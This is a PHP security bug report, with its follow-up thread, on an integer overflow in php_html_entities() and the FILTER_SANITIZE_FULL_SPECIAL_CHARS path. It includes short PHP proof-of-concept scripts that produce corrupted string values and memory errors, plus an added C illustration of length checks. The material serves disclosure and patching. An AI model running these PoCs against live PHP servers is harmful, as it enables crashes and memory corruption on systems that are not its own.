Sec Bug #72135 Integer Overflow in php_html_entities()
Submitted: 2016-05-01 18:47 UTC Modified: 2016-05-26 21:04 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: *General Issues
PHP Version: 5.5.35 OS: *
Private report: No CVE-ID: 2016-5094
 [2016-05-01 18:47 UTC] taoguangchen at icloud dot com
Description:
------------
```c
static void php_html_entities(INTERNAL_FUNCTION_PARAMETERS, int all)
{
	...
	size_t new_len;
	...
	RETVAL_STRINGL(replaced, (int)new_len, 0);
}
```

new_len is defined as size_t, then becomes a signed int in RETVAL_STRINGL(); that turns new_len into a negative value and gets a corrupted string-typed ZVAL.

PoC1:
```php
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	var_dump(strlen($str));
	
?>
```

PoC2:
```php
<?php

	ini_set('memory_limit', -1);
	$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
	md5($str);
	
?>
```

Fix:

Checking new_len


History

 [2016-05-02 02:34 UTC] taoguangchen at icloud dot com
A lot of functions given a corrupted string-typed ZVAL will be able to lead to a memory error, e.g.:

defined
class_exists
function_exists
...
trigger_error
date_default_timezone_set
hash_init
...
date
gmdate
...
collator_create
normalizer_normalize
grapheme_strlen
...
 [2016-05-04 14:22 UTC] taoguangchen at icloud dot com
Another example:

```c
ZEND_API int add_string_to_string(zval *result, const zval *op1, const zval *op2) /* {{{ */
{
	int length = Z_STRLEN_P(op1) + Z_STRLEN_P(op2);
	char *buf;

	if (IS_INTERNED(Z_STRVAL_P(op1))) {
		buf = (char *) emalloc(length+1);
		memcpy(buf, Z_STRVAL_P(op1), Z_STRLEN_P(op1));
	} else {
		buf = (char *) erealloc(Z_STRVAL_P(op1), length+1);
	}
	memcpy(buf + Z_STRLEN_P(op1), Z_STRVAL_P(op2), Z_STRLEN_P(op2));
```

PoC:
```php
<?php

ini_set('memory_limit', -1);
$str = htmlspecialchars(str_repeat('&', 0xffffffff/5));
"$str";

?>
```
 [2016-05-16 06:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-05-16 06:28 UTC] stas@php.net
Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda and in https://gist.github.com/d07b06bc967ecb94712f729198ae2e81. Please verify.
 [2016-05-16 07:43 UTC] taoguangchen at icloud dot com
The patch looks OK.
 [2016-05-17 12:55 UTC] taoguangchen at icloud dot com
A similar bug in filter:

```c
void php_filter_full_special_chars(PHP_INPUT_FILTER_PARAM_DECL)
{
	char *buf;
	size_t len;
	...
	buf = php_escape_html_entities_ex(Z_STRVAL_P(value), Z_STRLEN_P(value), &len, 1, quotes, SG(default_charset), 0 TSRMLS_CC);
	str_efree(Z_STRVAL_P(value));
	Z_STRVAL_P(value) = buf;
	Z_STRLEN_P(value) = len;
}
```

PoC:
```php
<?php

ini_set('memory_limit', -1);
$var = str_repeat('&', 0xffffffff/5);
$var = filter_var($var, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
echo "$var";

?>
```

You need to check all code that calls php_escape_html_entities_ex/php_escape_html_entities.
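The three fragments above (php_html_entities, add_string_to_string and php_filter_full_special_chars) share one root cause: a size_t or a sum of lengths is stored into an int without a range check. The following is an added illustration, not code from php-src or from the reporter, of what the narrowing does to the PoC's length and of the two checks the fix log describes ("don't create strings with lengths outside int range"). The helper names (escaped_len_for_ampersands, narrow_unchecked, narrow_checked, add_lengths_checked) are hypothetical and stand in for the RETVAL_STRINGL / Z_STRLEN_P sites; the input sizes are constructed to mirror the PoC's 0xffffffff/5 ampersands.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: number of output bytes htmlspecialchars() produces
 * for n copies of '&' (each '&' expands to the 5-byte "&amp;"). */
size_t escaped_len_for_ampersands(size_t n)
{
	return n * 5;
}

/* The unchecked cast the report describes: the size_t is narrowed to int,
 * and a value above INT_MAX comes out negative (two's-complement wrap on
 * mainstream compilers; formally implementation-defined in C). */
int narrow_unchecked(size_t len)
{
	return (int)len;
}

/* Hardened counterpart: refuse to build a string whose length does not
 * fit in int instead of storing a wrapped value in the zval.
 * Returns 0 and stores the int length on success, -1 if out of range. */
int narrow_checked(size_t len, int *out)
{
	if (len > (size_t)INT_MAX) {
		return -1;
	}
	*out = (int)len;
	return 0;
}

/* Checked version of "int length = Z_STRLEN_P(op1) + Z_STRLEN_P(op2)":
 * reject negative operands (a corrupted zval) and sums that overflow int,
 * so emalloc(length + 1) can never be asked for a tiny or negative size.
 * The + 1 for the terminator must fit as well, hence INT_MAX - 1. */
int add_lengths_checked(int a, int b, int *out)
{
	if (a < 0 || b < 0) {
		return -1;
	}
	if (a > INT_MAX - 1 - b) {   /* a + b + 1 would exceed INT_MAX */
		return -1;
	}
	*out = a + b;
	return 0;
}

int main(void)
{
	/* Constructed input mirroring the PoC: 0xffffffff/5 ampersands. */
	size_t n = 0xffffffffUL / 5;                /* 858993459 */
	size_t len = escaped_len_for_ampersands(n); /* 4294967295 */
	int checked = 0;

	printf("escaped length: %zu\n", len);
	printf("unchecked (int) cast: %d\n", narrow_unchecked(len));
	printf("checked narrowing: %s\n",
	       narrow_checked(len, &checked) == 0 ? "ok" : "rejected");
	return 0;
}
```

Running it shows the escaped length landing exactly on 0xffffffff, which the plain cast turns into a negative int while the checked path rejects it; the same comparison against INT_MAX is what every caller of php_escape_html_entities_ex needs before assigning to Z_STRLEN_P.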
 [2016-05-24 23:30 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0da8b8b801f9276359262f1ef8274c7812d3dfda
Log: Fix bug #72135 - don't create strings with lengths outside int range
 [2016-05-24 23:30 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-05-26 21:04 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2016-5094
 [2016-05-26 21:04 UTC] kaplan@php.net
Use CVE-2016-5094 for the original report that had the "[2016-05-16 06:28 UTC] Fix in security repo as 0da8b8b801f9276359262f1ef8274c7812d3dfda" response. Use CVE-2016-5095 for the additional issue reported in the "[2016-05-17 12:55 UTC]" comment.
 [2016-07-04 15:02 UTC] kaplan@php.net
Notice CVE-2016-5095 was fixed in 41fc3c76e97a36ff3b505da7d704ca17bb171fdf also part of PHP 5.5.36
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC